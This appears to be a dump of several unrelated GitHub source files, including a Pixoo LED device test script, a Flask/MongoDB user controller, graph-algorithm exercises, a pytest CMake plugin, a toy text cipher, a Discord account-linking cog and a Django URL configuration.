logger.info(\"music viz test\")\n d.set_music_visualizer(6)\n sleep(1)\n\n logger.info(\"game mode test -> slot\")\n # 0=tetris\n # 1=slots\n # 2=dice\n # 3=eight-ball\n # 4=breakout\n # 5=tetris again?\n # 6=half a pong\n # 7=rock paper scissors\n # 8=idk some man\n d.set_game(True, 1)\n sleep(1)\n elif test == 5:\n logger.info(\"digital clock mode rainbow test\")\n # somehow this keeps Pixoo from switching away from clock mode\n d.send_app_newest_time(False)\n\n for color in ((255, 0, 0), (0, 255, 0), (0, 0, 255)):\n r, g, b = color\n resp = d.set_light_mode_clock(TimeType.RAINBOW, r, g, b)\n logger.info(f\"set clock to rainbow({r}, {g}, {b}), response: {resp}\")\n sleep(0.4)\n\n resp = d.set_light_mode_clock(TimeType.SMALL, 255, 220, 220)\n logger.info(\"set clock to small, response:\", resp)\n\n d.set_brightness(100)\n elif test == 6:\n logger.info(\"weird temperature mode test\")\n # note: this is not the temperature mode the app uses\n box_mode = d.get_box_mode()\n d.set_light_mode_temperature(box_mode)\n sleep(1)\n d.set_brightness(50)\n elif test == 7:\n logger.info(\"green analog clock test\")\n # SPP_LIGHT_CURRENT_LEVEL\n p1 = b\"\\x01\\x03\\x00\\x31\\x34\\x00\\x02\"\n # SPP_SEND_APP_NEWEST_TIME\n p2 = b\"\\x01\\x04\\x00\\x26\\x00\\x2a\\x00\\x02\"\n parse_packet(p1)\n parse_packet(p2)\n d.write(p1)\n # d.write(p2)\n # clock green\n # SPP_SET_BOX_MODE\n p3 = bytes([1, 13, 0, 69, 0, 1, 100, 1, 0, 0, 0, 0, 255, 5, 188, 1, 2])\n parse_packet(p3)\n d.write(p3)\n elif test == 8:\n logger.info(\"light mode rainbow test\")\n d.set_brightness(100)\n\n d.set_light_mode_light(0xF8, 0x01, 0x79)\n\n for h in range(0, 255, 5):\n rgb = hsv_to_rgb(h, 1, 1)\n r, g, b = [int(round(x * 255)) for x in rgb]\n d.set_light_mode_light(r, g, b)\n sleep(0.1)\n elif test == 9:\n logger.info(\"VJ test\")\n d.send_app_newest_time(False)\n for i in range(16):\n logger.info(f\"VJ mode {i}\")\n d.set_light_mode_vj(i)\n sleep(1)\n\n logger.info(\"VJ mode 2 again\")\n d.set_light_mode_vj(2)\n elif test == 10:\n logger.info(\"clock mode border test\")\n d.set_time()\n d.send_app_newest_time(False)\n d.set_light_mode_clock(TimeType.BORDER, 0x9D, 0xFC, 0x05)\n d.set_brightness(100)\n elif test == 11:\n logger.info(\"image mode mudkip test\")\n from binascii import unhexlify\n\n p = unhexlify(\n \"01860044000a0a04aa7f00f40100080000004dbbef2989c8c1c3c5ff9f00ffffff1f1f30bf5c1500002001000000002402\"\n + \"000000002402000000004402000000904409000000922449b00140922449b20d64d22469420e64e22471420e27e32471c8\"\n + \"0ff89b2449ff0d00d6b6adb60d00a06d92b40d00a06d89a40100106d89a401001049893400512802\"\n )\n parse_packet(p)\n d.write(p)\n elif test == 12:\n d.set_time()\n d.set_light_mode_clock(\n TimeType.BIG,\n 0,\n 0,\n 255,\n ActivatedModes(clock=True, weather=True, temperature=True, date=False),\n )\n d.set_brightness(10)\n\n rp = RawPixmap(16, 16)\n img = rp.load_image(\"test.png\")\n pixels = rp.decode_image(img)\n rp.set_rgb_pixels(pixels)\n\n ee = EvoEncoder()\n x = ee.image_bytes(rp.get_pixel_data())\n parse_packet(x)\n d.write(x)\n elif test == 13:\n d.set_music_visualizer(4)\n elif test == 14:\n d.set_game(True, 0)\n sleep(1)\n d.set_score(50, 999)\n sleep(1)\n d.set_time()\n d.set_light_mode_clock(\n TimeType.BIG,\n 0,\n 0,\n 255,\n ActivatedModes(clock=True, weather=True, temperature=True, date=False),\n )\n sleep(1)\n d.set_light_mode_vj(1)\n sleep(1)\n d.set_brightness(10)\n sleep(1)\n\n # val = bytes([BoxMode.USER_DEFINE])\n # d.write_command(Command.SET_BOX_MODE, val)\n # https://github.com/jfroehlich/node-p1x3lramen/blob/main/source/devices/pixoo.js\n # https://github.com/DavidVentura/divoom/blob/master/divoom/protocol.py\n\n val = bytes([12, WeatherType.CLEAR])\n d.write_command(Command.SET_CLIMATE, val)\n\n val = bytes([0])\n d.write_command(Command.SET_24_HOUR, val)\n sleep(1)\n else:\n raise ValueError(\"invalid test id\")\n","repo_name":"spezifisch/divo","sub_path":"divo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"19811240766","text":"from flask import Flask, request\r\nfrom model import dbConn\r\n\r\napp = Flask(__name__)\r\n\r\nclass MainController(object):\r\n# >>>>>> --- Insert user details to DB --- <<<<<<\r\n def insertUser(self, uDetails):\r\n if dbConn.db.UserCollections.count({\"Name\": uDetails['Name']}) == 0: \r\n result = dbConn.db.UserCollections.insert_one(uDetails)\r\n if (result.acknowledged):\r\n # status = 'Insert Successfull'\r\n # user = self.displayAllUser()\r\n user = self.displaySingleUser(uDetails)\r\n print(user)\r\n return user\r\n else:\r\n return 'Duplicate user'\r\n \r\n# >>>>>> --- Update the user Address --- <<<<<<\r\n def updateUser(self, uInput):\r\n userExist = self.findUser(uInput)\r\n if userExist:\r\n dbConn.db.UserCollections.update(\r\n {\r\n 'Name': uInput['Name']\r\n },\r\n {\r\n '$set':{\r\n 'Address': uInput['Address']\r\n }\r\n\r\n }, multi = False\r\n )\r\n print('Record updated successfully!!\\n', uInput)\r\n return self.displaySingleUser(uInput)\r\n else:\r\n print('User doesnot exist')\r\n return 'User doesnot exist' \r\n\r\n# >>>>>> --- Delete User Details --- <<<<<<\r\n\r\n def deleteUser(self, uInput):\r\n userExist = self.findUser(uInput)\r\n if userExist:\r\n dbConn.db.UserCollections.delete_one({\r\n 'Name': uInput['Name']\r\n })\r\n print('!!!-----Record Deleted----!!!')\r\n return self.displayAllUser()\r\n else: \r\n return 'Please enter valid user details to delete'\r\n\r\n# >>>>>> --- Display one user details --- <<<<<<\r\n def displaySingleUser(self, findUser): \r\n details = [] \r\n uCollections = dbConn.db.UserCollections.find({'Name': findUser['Name']}, {'_id':0, 'Name':1, 'Address':1})\r\n for userColumn in uCollections:\r\n details.append(userColumn)\r\n # print(details)\r\n return details\r\n \r\n# >>>>>> --- Display all user details --- <<<<<<\r\n def displayAllUser(self): \r\n users = [] \r\n uCollections = dbConn.db.UserCollections.find({}, {'_id':0, 'Name':1, 'Address':1})\r\n for allrecord in uCollections:\r\n users.append(allrecord) \r\n # print(users)\r\n return users\r\n \r\n# >>>>>> --- Checking for user if exists --- <<<<<< \r\n def findUser(self, search):\r\n if dbConn.db.UserCollections.count({\"Name\": search['Name']}) == 0:\r\n return False\r\n else:\r\n return True\r\n","repo_name":"Sudarshana-Shetty/MVC","sub_path":"MVC/controller/mainController.py","file_name":"mainController.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33132475907","text":"from itertools import permutations\nfrom math import sqrt\ndef solution(numbers):\n answer = 0\n numbers = list(numbers)\n size = len(numbers)\n numlist = []\n \n for i in range(1, size + 1):\n for j in permutations(numbers, i):\n j = \"\".join(j)\n if j[0] == '0' or j[-1] == '0' or j in numlist:\n continue\n numlist.append(j)\n\n for num in numlist:\n num = int(num)\n if num == 2 or num == 3: answer += 1\n if num >= 4:\n for i in range(2, int(sqrt(num))+1):\n if num % i == 0:\n break\n if i == int(sqrt(num)):\n answer += 1\n break\n\n return answer","repo_name":"123qpq/programers","sub_path":"level2/소수찾기.py","file_name":"소수찾기.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28533980025","text":"from vertex_example import *\nimport math\n\ndef bfs(G,s):\n for i in G:\n if(i != s):\n i.c = VertexColor.WHITE\n i.d2 = math.inf\n i.p = None\n q = []\n s.c = VertexColor.GRAY\n s.d2 = 0\n s.p = None\n q.append(s)\n\n while (len(q) > 0):\n u = q.pop()\n for i in u.d1:\n if (i.c == VertexColor.WHITE):\n i.c = VertexColor.GRAY\n i.d2 = u.d2+1\n i.p = u\n q.append(i)\n u.c = VertexColor.BLACK\n\ndef printPath(G, s, v):\n if(v == s):\n print(s.n)\n elif(v.p == None):\n print(\"No path from\", s.n, \"to\", v.n, \"exists!\")\n else:\n printPath(G, s, v.p)\n print(v.n)\n\ndef dfs(G):\n print(\"DFS\")\n for node in G:\n node.c = VertexColor.WHITE\n node.p = None\n time = Time()\n for node in G:\n if(node.c == VertexColor.WHITE):\n dfsVisit(G, node, time)\n\ndef dfsVisit(G, u, time):\n time.t +=1\n u.d2 = time\n u.c = VertexColor.GRAY\n for node in u.d1:\n if(node.c == VertexColor.WHITE):\n node.p = u\n dfsVisit(G, node, time)\n u.c = VertexColor.BLACK\n time.t+=1\n u.f = time.t\n print(\"Vertex:\", u.n, \"Finish time:\", u.f)\n\ndef topologicalSort(G):\n dfs(G)\n G.sort(reverse = True)\n \n\nvertex = []\n\nfor i in range(6):\n vertex.append(Vertex(c = VertexColor.WHITE, n = i+1))\n\nv0_list = []\nv0_list.append(vertex[1])\nv0_list.append(vertex[3])\nvertex[0].d1 = v0_list\n\nv1_list = []\nv1_list.append(vertex[4])\nvertex[1].d1 = v1_list\n\nv2_list = []\nv2_list.append(vertex[5])\nv2_list.append(vertex[4])\nvertex[2].d1 = v2_list\n\nv3_list = []\nv3_list.append(vertex[1])\nvertex[3].d1 = v3_list\n\nv4_list = []\nv4_list.append(vertex[3])\nvertex[4].d1 = v4_list\n\nv5_list = []\nv5_list.append(vertex[5])\nvertex[5].d1 = v5_list\n\nfor i in range(6):\n print(\"Neighbors of Vertex:\", i+1)\n for j in range(len(vertex[i].d1)):\n print(vertex[i].d1[j].n)\n print()\n\nbfs(vertex, vertex[0])\nprintPath(vertex, vertex[0], vertex[4])\n\nprint()\nprint()\ndfs(vertex)\n\nclothes = []\nundershorts = Vertex(n = \"undershorts\")\nsocks = Vertex(n = \"socks\")\npants = Vertex(n = \"pants\")\nshoes = Vertex(n = \"shoes\")\nwatch = Vertex(n = \"watch\")\nbelt = Vertex(n = \"belt\")\nshirt = Vertex(n = \"shirt\")\ntie = Vertex(n = \"tie\")\njacket = Vertex(n = \"jacket\")\n\nundershorts.d1 = [pants, shoes]\nsocks.d1 = [shoes]\npants.d1 = [belt, shoes]\nshirt.d1 = [belt, tie]\nbelt.d1 = [jacket]\ntie.d1 = [jacket]\nwatch.d1 = []\njacket.d1 = []\nshoes.d1 = []\n\nclothes.append(undershorts)\nclothes.append(socks)\nclothes.append(pants)\nclothes.append(shoes)\nclothes.append(watch)\nclothes.append(belt)\nclothes.append(shirt)\nclothes.append(tie)\nclothes.append(jacket)\n\nprint()\nprint()\n\nprint(\"Topological Sort\")\n\ntopologicalSort(clothes)\nprint()\nfor i in clothes:\n print(i.n)\n","repo_name":"skostic14/PA_vezbe","sub_path":"vezba09/Zadatak/Zadatak/Zadatak.py","file_name":"Zadatak.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31138056045","text":"import disnake\n\nfrom CustomClasses.CustomBot import CustomClient\nfrom CustomClasses.CustomPlayer import MyCustomPlayer\nfrom disnake.ext import commands\nfrom CustomClasses.CustomServer import CustomServer\nfrom .eval_logic import eval_logic\n\nclass LinkWelcomeMessages(commands.Cog):\n\n def __init__(self, bot: CustomClient):\n self.bot: CustomClient = bot\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n results = await self.bot.welcome.find_one({\"$and\" : [{\"server\": member.guild.id}, {\"welcome_link_channel\" : {\"$ne\" : None}}]})\n if results is not None:\n\n link_channel = results.get(\"welcome_link_channel\")\n if link_channel is not None:\n if results.get(\"welcome_link_embed\") is not None:\n embed = disnake.Embed.from_dict(data=results.get(\"welcome_link_embed\"))\n else:\n embed = disnake.Embed(title=f\"**Welcome to {member.guild.name}!**\",\n description=f\"To link your account, press the link button below to get started.\",\n color=disnake.Color.green())\n stat_buttons = [disnake.ui.Button(label=\"Link Account\", emoji=\"🔗\", style=disnake.ButtonStyle.green,\n custom_id=\"Start Link\"),\n disnake.ui.Button(label=\"Help\", emoji=\"❓\", style=disnake.ButtonStyle.grey,\n custom_id=\"Link Help\")]\n buttons = disnake.ui.ActionRow()\n for button in stat_buttons:\n buttons.append_item(button)\n if member.guild.icon is not None:\n embed.set_thumbnail(url=member.guild.icon.url)\n try:\n channel = await self.bot.getch_channel(link_channel, raise_exception=True)\n if member.guild.id == 923764211845312533:\n await channel.send(content=member.mention, embed=embed, components=[stat_buttons], allowed_mentions=disnake.AllowedMentions.none())\n else:\n await channel.send(content=member.mention, embed=embed, components=[stat_buttons])\n except (disnake.NotFound, disnake.Forbidden):\n await self.bot.welcome.update_one({\"server\": member.guild.id}, {\"$set\" : {\"link_channel\" : None}})\n\n @commands.Cog.listener()\n async def on_button_click(self, ctx: disnake.MessageInteraction):\n\n if ctx.data.custom_id == \"Start Link\":\n components = [\n disnake.ui.TextInput(\n label=\"Player Tag\",\n placeholder=\"Your player tag as found in-game.\",\n custom_id=f\"player_tag\",\n required=True,\n style=disnake.TextInputStyle.single_line,\n max_length=12,\n )\n ]\n token_option = await self.bot.server_db.find_one({\"server\": ctx.guild.id})\n token_option = token_option.get(\"api_token\", True)\n\n if token_option:\n token_text = \"Api Token\"\n else:\n token_text = \"(Optional) Api Token\"\n components.append(\n disnake.ui.TextInput(\n label=token_text,\n placeholder=\"Your Api Token as found in-game.\",\n custom_id=f\"api_token\",\n required=token_option,\n style=disnake.TextInputStyle.single_line,\n max_length=12,\n ))\n await ctx.response.send_modal(\n title=\"Link your account\",\n custom_id=\"linkaccount-\",\n components=components)\n\n def check(res):\n return ctx.author.id == res.author.id\n\n try:\n modal_inter: disnake.ModalInteraction = await self.bot.wait_for(\n \"modal_submit\",\n check=check,\n timeout=300,\n )\n except:\n return\n\n player_tag = modal_inter.text_values[\"player_tag\"]\n api_token = modal_inter.text_values[\"api_token\"]\n if not modal_inter.response.is_done():\n await modal_inter.response.defer(ephemeral=True)\n server = CustomServer(guild=ctx.guild, bot=self.bot)\n change_nickname = await server.nickname_choice\n\n player: MyCustomPlayer = await self.bot.getPlayer(player_tag=player_tag, custom=True)\n if player is None:\n clan = await self.bot.getClan(clan_tag=player_tag)\n if clan is not None:\n embed = disnake.Embed(\n description=f\"Sorry, `{player_tag}` is invalid and it also appears to be the **clan** tag for {clan.name}\\nUse the image below to help find your player tag.\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n return await modal_inter.send(embed=embed, ephemeral=True)\n else:\n embed = disnake.Embed(\n description=f\"**Sorry, `{player_tag}` is an invalid player tag** :( \\nUse the image below to help find your player tag.\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n return await modal_inter.send(embed=embed, ephemeral=True)\n\n link_id = await player.linked()\n\n if token_option:\n verified = await player.verify(api_token=api_token)\n elif link_id != ctx.author.id and link_id is not None:\n verified = await player.verify(api_token=api_token)\n else:\n verified = True\n\n if link_id == ctx.author.id:\n embed = await eval_logic(bot=self.bot, guild=ctx.guild, members_to_eval=[ctx.author], role_or_user=ctx.author,\n test=False,\n change_nick=change_nickname,\n return_embed=True)\n return await modal_inter.send(embed=embed, ephemeral=True)\n elif verified:\n try:\n await self.bot.link_client.delete_link(player.tag)\n except:\n pass\n await player.add_link(ctx.author)\n embed: disnake.Embed = await eval_logic(bot=self.bot, guild=ctx.guild, members_to_eval=[ctx.author], role_or_user=ctx.author,\n test=False,\n change_nick=change_nickname,\n return_embed=True)\n embed.title = f\"**{player.name} successfully linked**\"\n await modal_inter.send(embed=embed, ephemeral=True)\n try:\n results = await self.bot.clan_db.find_one({\"$and\": [\n {\"tag\": player.clan.tag},\n {\"server\": ctx.guild.id}\n ]})\n if results is not None:\n greeting = results.get(\"greeting\")\n if greeting is None:\n badge = await self.bot.create_new_badge_emoji(url=player.clan.badge.url)\n greeting = f\", welcome to {badge}{player.clan.name}!\"\n channel = results.get(\"clanChannel\")\n channel = self.bot.get_channel(channel)\n await channel.send(f\"{ctx.author.mention}{greeting}\")\n except:\n pass\n elif not verified:\n if token_option:\n embed = disnake.Embed(\n description=f\"The player you are looking for is [{player.name}]({player.share_link}), however it appears u may have made a mistake.\\n Double check your api token again.\",\n color=disnake.Color.red())\n await modal_inter.send(embed=embed, ephemeral=True)\n else:\n embed = disnake.Embed(\n description=f\"[{player.name}]({player.share_link}) is already linked to another user. Please try again with an api token.\",\n color=disnake.Color.red())\n await modal_inter.send(embed=embed, ephemeral=True)\n\n\n elif ctx.data.custom_id == \"Link Help\":\n embed = disnake.Embed(title=\"Finding a player tag\",\n description=f\"- Open Game\\n- Navigate to your account's profile\\n- Near top left click copy icon to copy player tag to clipboard\\n\"\n f\"- Make sure it is the player tag & **not** the clan\\n- View photo below for reference\",\n color=disnake.Color.red())\n embed.set_image(\n url=\"https://cdn.discordapp.com/attachments/886889518890885141/933932859545247794/bRsLbL1.png\")\n embed2 = disnake.Embed(\n title=\"What is your api token? \",\n description=f\"- Reference below for help finding your api token.\\n- Open Clash and navigate to Settings > More Settings\\n- **OR** use the following link:\\nhttps://link.clashofclans.com/?action=OpenMoreSettings\" +\n \"\\n- Scroll down to the bottom and copy the api token.\\n- View the picture below for reference.\",\n color=disnake.Color.red())\n embed2.set_image(\n url=\"https://cdn.discordapp.com/attachments/843624785560993833/961379232955658270/image0_2.png\")\n await ctx.send(embeds=[embed, embed2], ephemeral=True)\n\ndef setup(bot: CustomClient):\n bot.add_cog(LinkWelcomeMessages(bot))","repo_name":"MagicTheDev/ClashKing","sub_path":"Link_and_Eval/link_button.py","file_name":"link_button.py","file_ext":"py","file_size_in_byte":10268,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"5729895008","text":"from _Crypt import *\n\nclass Encryption:\n method,message,_key,_cipher = 0,'','',''\n def __init__(self,method= 5,message='',key=''):\n self.set_all(method,message,key)\n\n def set_all(self,method,message,key):\n self.set_method(method)\n self.set_message(message)\n self.set_key(key)\n\n def set_method(self,method = 5):\n if set_technique(method):\n self.method = method\n else:\n print('Invalid method it should be (4<= method <=8) {default = 5}')\n\n def set_message(self,message):\n self.message = message\n\n def append_message(self,append_string):\n self.message += append_string\n \n def set_key(self,key):\n if set_key(key):\n self._key = key\n else:\n raise 'Invalid Key, It should be valued 0< key <(2^(technique))'\n\n def set_limit(self,limit):\n set_limit(limit)\n\n def Encrypt(self,technique=0, message='', key=''):\n if technique == 0 : technique=self.method\n if message == '' : message = self.message\n if key == '' : key = self._key\n self.set_all(technique,message,key)\n _size = get_size()\n _right_shift = break_rshift(message) #break and right shift the message\n _binary_msg = unival_bin(_right_shift) #UTF-8 formed binary of unicode value \n _divided_bin = '' #will hold the divided binary values(sized=_size+1)\n self._cipher = '' #will hold the characters after encryption\n for i in range(0,len(_binary_msg),_size): #divides the message chunk by chunk\n temp_bin_str = _binary_msg[i:i+_size]\n _divided_bin += divide(temp_bin_str)\n for i in range(0,len(_divided_bin),_size+1): #will create the cipher text of _size+1 bit chunks\n temp_bin_str = _divided_bin[i:i+_size+1]\n self._cipher += bin_cipher(temp_bin_str)\n return self._cipher\n\nclass Decryption:\n method,cipher,_key,_message = 0,'','',''\n def __init__(self,method= 5,cipher='',key=''):\n self.set_all(method,cipher,key)\n\n def set_all(self,method,cipher,key):\n self.set_method(method)\n self.set_cipher(cipher)\n self.set_key(key)\n\n def set_method(self,method = 5):\n if set_technique(method):\n self.method = method\n else:\n print('Invalid method it should be (4<= method <=8) {default = 5}')\n\n def set_cipher(self,cipher):\n self.cipher = cipher\n \n def set_key(self,key):\n if set_key(key):\n self._key = key\n else:\n return 'Invalid Key, It should be valued 0< key <(2^(technique))'\n\n def set_limit(self,limit):\n set_limit(limit)\n\n def Decrypt(self,method=0,cipher='',key=''):\n if method == 0 : method = self.method\n if cipher == '' : cipher = self.cipher\n if key == '' : key = self._key\n self.set_all(method,cipher,key)\n _size = get_size()\n _cipher_bin = cipher_bin(cipher)\n _mul_byte = ''\n self._message = ''\n for i in range(0,len(_cipher_bin),_size+1):\n byte = _cipher_bin[i:i+_size+1]\n _mul_byte += multiply(byte)\n _bin_unicode = bin_unicode(_mul_byte)\n self._message = break_lshift(_bin_unicode)\n return self._message\n\n","repo_name":"ErHarshRathore/FileEncryptor","sub_path":"Crypt.py","file_name":"Crypt.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14338338989","text":"from pathlib import Path\nimport shutil\n\nfrom pytest import Collector, Parser, PytestPluginManager\n\nfrom . import hooks, items\n\n\ndef pytest_addoption(parser: Parser):\n group = parser.getgroup(\"cmake-presets\", description=\"cmake presets options\")\n group.addoption(\n \"--cmake\",\n help=\"Path to the cmake executable to use in configure, build, and workflow presets\",\n default=shutil.which(\"cmake\"),\n type=Path,\n )\n group.addoption(\n \"--ctest\",\n help=\"Path to the ctest executable to use for test presets\",\n default=shutil.which(\"ctest\"),\n type=Path,\n )\n group.addoption(\n \"--cpack\",\n help=\"Path to the cpack executable to use for package presets\",\n default=shutil.which(\"cpack\"),\n type=Path,\n )\n\n\ndef pytest_addhooks(pluginmanager: PytestPluginManager):\n pluginmanager.add_hookspecs(hooks)\n pluginmanager.register(items)\n\n\ndef pytest_collect_file(parent: Collector, file_path: Path) -> Collector | None:\n if file_path.name == \"CMakePresets.json\":\n return items.CMakePresetsFile.from_parent(parent, path=file_path.parent)\n","repo_name":"ixm-one/pytest-cmake-presets","sub_path":"src/cmake_presets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72310699040","text":"\"\"\"added goal properties\n\nRevision ID: 5018059c5c8f\nRevises: 16b4a243d41d\nCreate Date: 2015-09-23 11:56:01.897992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5018059c5c8f'\ndown_revision = '16b4a243d41d'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('goalproperties',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), nullable=False),\n sa.Column('is_variable', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('goals_goalproperties',\n sa.Column('goal_id', sa.Integer(), nullable=False),\n sa.Column('property_id', sa.Integer(), nullable=False),\n sa.Column('value', sa.String(length=255), nullable=True),\n sa.Column('value_translation_id', sa.Integer(), nullable=True),\n sa.Column('from_level', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['goal_id'], ['goals.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['property_id'], ['goalproperties.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['value_translation_id'], ['translationvariables.id'], ondelete='RESTRICT'),\n sa.PrimaryKeyConstraint('goal_id', 'property_id', 'from_level')\n )\n op.add_column(u'goals', sa.Column('name', sa.String(length=255), nullable=False, server_default=\"\"))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(u'goals', 'name')\n op.drop_table('goals_goalproperties')\n op.drop_table('goalproperties')\n ### end Alembic commands ###\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/ActiDoo/gamification-engine/gengine/alembic/versions/5018059c5c8f_added_goal_properties.py","file_name":"5018059c5c8f_added_goal_properties.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18408680148","text":"#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\nif __name__ == \"__main__\":\n\n for line in sys.stdin:\n\n num, letters = line.strip().split()\n letters = letters.split(',')\n \n if len(num) == 1:\n num = \"0\" + num\n\n for letter in letters:\n print (\"{}\\t{}\".format(letter, num))\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-DanielDi","sub_path":"pregunta_10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22601319457","text":"emoji_dict = {\":)\": \"🙂\", \":(\": \"🙁\", \":P\": \"😋\", \":/\": \"😕\", \"<3\": \"❤\"}\n\n\ndef display(data):\n new_data = data\n\n if data == \"ADMIN\":\n emo_1 = input(\"Emoji RAW : \")\n emo_2 = input(\"Emoji OP : \")\n emoji_dict[emo_1] = emo_2\n print(\"Emoji inserted...\")\n else:\n for i in emoji_dict.keys():\n if i in data:\n new_data = new_data.replace(i, emoji_dict[i])\n print(\"OLD :\", data)\n print(\"NEW :\", new_data)\n return\n\n\nif __name__ == \"__main__\":\n while True:\n text = input(\"Type your Message : \")\n if text == \"N\" or text == \"n\":\n break\n else:\n display(text)\n print(\"--END--\")\n","repo_name":"sanyamcodes26/Efforts","sub_path":"OGma/5_Emoji.py","file_name":"5_Emoji.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42987314986","text":"from django.conf.urls import include, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import path\n\nfrom rh.views import (AtivismoDetalhesView, AtivismoView, BibliotecaView,\n CanaisProprietariosView, CertificacaoView,\n ClienteAtivosView, ClienteDetalhesView,\n ClienteInativosView, ClienteView, ClimaDetalhesView,\n ClimaView, ColaboradoresDetalhesView, ColaboradoresView,\n ContatoView, CursoDetalhesView, CursoView,\n FeedbackDetalhesView, FeedbackView, FerramentaView,\n FinanceiroDetalhesView, FinanceiroTotalView,\n FolguinhaView, FornecedoresDetalhesView,\n FornecedoresView, HierarquiaView, IndexView,\n InscricaoView, JuridicoView, LoginShootView,\n LogoutShootView, MomentoImportanteView, NewsletterView,\n PalestraView, PremiacaoView, ProjetoDetalhesView,\n ProjetoView, PromocaoView, PropostaDetalhesView,\n PropostaView, ResultadoCanalView, TipoProjetoView,\n VisaoView, WorkshopView)\n\nurlpatterns = [\n path(\"ativismo/\", AtivismoView.as_view(), name=\"ativismo\"),\n path(\"ativismo//\", AtivismoDetalhesView.as_view(), name=\"detalhes_ativismo\"),\n path(\"biblioteca/\", BibliotecaView.as_view(), name=\"biblioteca\"),\n path(\"canais/\", CanaisProprietariosView.as_view(), name =\"canaisproprietarios\"),\n path(\"certificacoes/\", CertificacaoView.as_view(), name =\"certificacoes\"),\n path(\"clientes/\", ClienteView.as_view(), name=\"lista_cliente\"),\n path(\"clientes/ativos/\", ClienteAtivosView.as_view(), name=\"lista_cliente_ativos\"),\n path(\"clientes/inativos/\", ClienteInativosView.as_view(), name=\"lista_cliente_inativos\"),\n path(\"clientes//\", ClienteDetalhesView.as_view(), name=\"detalhes_cliente\"),\n path(\"clima/\", ClimaView.as_view(), name=\"lista_climas\"),\n path(\"clima//\", ClimaDetalhesView.as_view(), name=\"clima\"),\n path(\"colaboradores/\", ColaboradoresView.as_view(), name=\"lista_colaboradores\"),\n path(\"colaboradores//\", ColaboradoresDetalhesView.as_view(), name=\"detalhes_colaborador\"),\n path(\"contato/\", ContatoView.as_view(), name=\"contato\"),\n path(\"curso/\", CursoView.as_view(), name=\"curso\"),\n path(\"curso//\", CursoDetalhesView.as_view(), name=\"lista_curso\"),\n path(\"feedback/\", FeedbackView.as_view(), name=\"feedback\"),\n path(\"ferramentas/\", FerramentaView.as_view(), name=\"ferramentas\"),\n path(\"feedback//\", FeedbackDetalhesView.as_view(), name=\"detalhes_feedback\"),\n path(\"financeiro/\", FinanceiroTotalView.as_view(), name=\"contas\"),\n path(\"financeiro//\", FinanceiroDetalhesView.as_view(), name=\"contas\"),\n path(\"folguinha/\", FolguinhaView.as_view(), name=\"folguinha\"),\n path(\"fornecedores/\", FornecedoresView.as_view(), name=\"lista_fornecedores\"),\n path(\"fornecedores//\", FornecedoresDetalhesView.as_view(), name=\"detalhes_fornecedores\"),\n path(\"hierarquia/\", HierarquiaView.as_view(), name=\"hierarquia\"),\n path(\"inscricao/\", InscricaoView.as_view(), name = \"inscricao\"),\n path(\"\", IndexView.as_view(), name=\"index\"),\n path(\"juridicos/\", JuridicoView.as_view(), name = \"juridicos\"),\n path(\"momentos/\", MomentoImportanteView.as_view(), name=\"MomentoImportante\"),\n path(\"newsletters/\", NewsletterView.as_view(), name=\"newsletter\"),\n path(\"palestra/\", PalestraView.as_view(), name=\"palestras\"),\n path(\"premiacao/\", PremiacaoView.as_view(), name=\"premiacoes\"),\n path(\"projetos/\", ProjetoView.as_view(), name=\"lista_projeto\"),\n path(\"projetos//\", ProjetoDetalhesView.as_view(), name=\"detalhes_projeto\"),\n path(\"promocao/\", PromocaoView.as_view(), name=\"promocao\"),\n path(\"propostas/\", PropostaView.as_view(), name=\"lista_proposta\"),\n path(\"propostas//\", PropostaDetalhesView.as_view(), name=\"detalhes_proposta\"),\n path(\"resultados/\", ResultadoCanalView.as_view(), name=\"resultadoscanais\"),\n path(\"tipo-projeto/\", TipoProjetoView.as_view(), name=\"lista_TipoProjeto\"),\n path(\"workshop/\", WorkshopView.as_view(), name=\"workshop\"),\n path(\"visao/\", VisaoView.as_view(), name=\"visao\"),\n 